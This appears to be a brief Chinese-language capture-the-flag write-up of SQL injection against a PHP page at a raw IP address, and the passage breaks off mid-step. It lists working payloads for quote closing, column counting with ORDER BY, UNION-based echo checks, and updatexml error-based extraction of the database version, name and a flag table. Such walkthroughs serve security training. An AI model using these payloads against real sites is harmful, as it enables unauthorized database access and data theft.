闭合
http://47.103.94.191:8034/show.php?id=33--+
查列数
http://47.103.94.191:8034/show.php
?...id=33 order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
查看回显
http://47.103.94.191:8034/show.php
?...id=333 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
查看数据库名字、版本
http://47.103.94.191:8034/show.php...id=33 and updatexml(1,concat(0x7e,version(),0x7e,database(),0x7e),2)--+
查看表名(这里对输出的个数有限制,因此使用limit进行限制...='cms' and table_name='this_is_flag' limit 1,1),0x7e),2)--+
查看数据(这里由于flag太长了,无法一次显示,因此使用mid进行截断)
首先查看下